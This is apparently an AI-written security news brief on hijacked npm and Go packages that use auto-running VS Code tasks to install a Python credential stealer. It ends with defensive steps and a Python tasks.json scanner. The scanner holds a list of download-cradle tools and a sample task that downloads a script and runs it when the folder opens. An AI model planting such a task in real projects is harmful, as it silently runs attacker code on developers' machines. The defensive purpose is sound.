
Hijacked npm and Go Packages Drop Python Infostealer via VS Code Tasks

Supply chain attackers have hijacked at least two npm packages and a cluster of Go modules, repurposing them to silently deploy a Python-based information stealer on developer machines running Windows, Linux, and macOS, according to researchers reporting at The Hacker News.

What Happened

The attack's most notable feature is its delivery mechanism. Rather than using npm lifecycle hooks (preinstall, postinstall) — the standard tripwire that SCA scanners and npm audit watch — the malicious packages inject a .vscode/tasks.json file into the victim's workspace. VS Code will automatically execute workspace tasks on folder open when the folder is trusted, meaning the payload fires without producing any npm install side-effect that conventional tooling would flag.

The Go module cluster follows a similar pattern, abusing the fetch process to pull down additional payloads at module resolution time. Once execution is achieved, a dropper installs a Python-based infostealer that harvests browser-stored credentials, session cookies, saved passwords, and crypto wallet files, exfiltrating them to an attacker-controlled endpoint.

Why It Matters

This campaign targets developers specifically, which makes the downstream risk unusually high:

What To Do

  1. Audit .vscode/tasks.json in every project you've recently cloned or opened. Any task invoking python, curl, wget, or PowerShell download cradles outside your expected toolchain is a red flag.
  2. Review workspace trust settings. In VS Code, search Settings for security.workspace.trust and audit your trusted folders (File → Preferences → Manage Trusted Folders & Workspaces). Remove trust from any folder you don't recognise.
  3. Check recently added or updated npm and Go dependencies. Focus on packages added in the past several weeks. Compare current package tarballs against published versions on the registry if anything looks suspect.
  4. Rotate credentials if you may be affected. Assume browser-stored passwords, SSH keys, AWS/GCP/Azure tokens, and API keys are compromised. Check authentication logs for anomalous sign-ins.
  5. Switch to deeper SCA tooling. Scanners like Socket.dev or Phylum perform full package-content behavioral analysis rather than relying on metadata alone — the only layer that catches file-drop attacks like this one.
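As an added example for step 1 (not code from the article or the researchers it cites), a small Python triage script: it parses VS Code's JSON-with-comments tasks.json, flags tasks configured with runOn: folderOpen, and flags command lines that invoke download cradles or interpreters. The suspicious-tool list and the embedded sample tasks.json are constructed assumptions, not published indicators.

```python
"""Triage .vscode/tasks.json for auto-running tasks that call download or interpreter tools."""
import json
import re
from pathlib import Path

# Tools commonly used as download cradles or to launch a dropped payload (assumed heuristic list).
SUSPICIOUS = re.compile(r"\b(python3?|curl|wget|powershell|pwsh|iex|invoke-webrequest|invoke-expression|certutil|bitsadmin)\b", re.IGNORECASE)

def load_jsonc(text: str) -> dict:
    """Parse VS Code's JSON-with-comments: strips /* */ blocks, full-line // comments and trailing commas (simplified, not a full JSONC parser)."""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.DOTALL)
    text = re.sub(r"^\s*//.*$", "", text, flags=re.MULTILINE)
    text = re.sub(r",(\s*[}\]])", r"\1", text)
    return json.loads(text)

def task_command_line(task: dict) -> str:
    """Flatten command plus args (plain string or {"value": ...} form) into one searchable string."""
    parts = [str(task.get("command", ""))]
    for arg in task.get("args", []):
        parts.append(arg if isinstance(arg, str) else str(arg.get("value", "")))
    return " ".join(parts)

def audit_tasks(doc: dict) -> list:
    """Flag tasks that run on folderOpen and/or invoke a suspicious tool."""
    findings = []
    for task in doc.get("tasks", []):
        cmdline = task_command_line(task)
        auto_run = task.get("runOptions", {}).get("runOn") == "folderOpen"
        tools = sorted({m.lower() for m in SUSPICIOUS.findall(cmdline)})
        if auto_run or tools:
            findings.append({"label": task.get("label", "<unnamed>"), "auto_run": auto_run,
                             "tools": tools, "command": cmdline})
    return findings

def audit_tree(root) -> dict:
    """Audit every .vscode/tasks.json beneath a directory of cloned projects; keys are paths with findings."""
    return {str(p): f for p in Path(root).rglob(".vscode/tasks.json")
            if (f := audit_tasks(load_jsonc(p.read_text(encoding="utf-8"))))}

# Constructed sample mirroring the pattern described in the article; not a real indicator.
SAMPLE = """{
  // workspace tasks
  "version": "2.0.0",
  "tasks": [
    {"label": "lint", "type": "shell", "command": "npm run lint"},
    {"label": "init", "type": "shell", "runOptions": {"runOn": "folderOpen"},
     "command": "curl -s http://example.invalid/u.py -o /tmp/u.py && python3 /tmp/u.py",},
  ],
}"""
```

Run audit_tree over the parent directory of your checkouts; an empty dict means no task was auto-run or matched the tool list, not that the dependency tree is clean.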

The specific package names and IOCs had not been fully published at time of writing. Watch The Hacker News coverage for confirmed indicators as they are released.

Sources
  1. Hijacked npm and Go Packages Use VS Code Tasks to Deploy Python Infostealer

Synthesized by Claude · sanity-checked before publish.
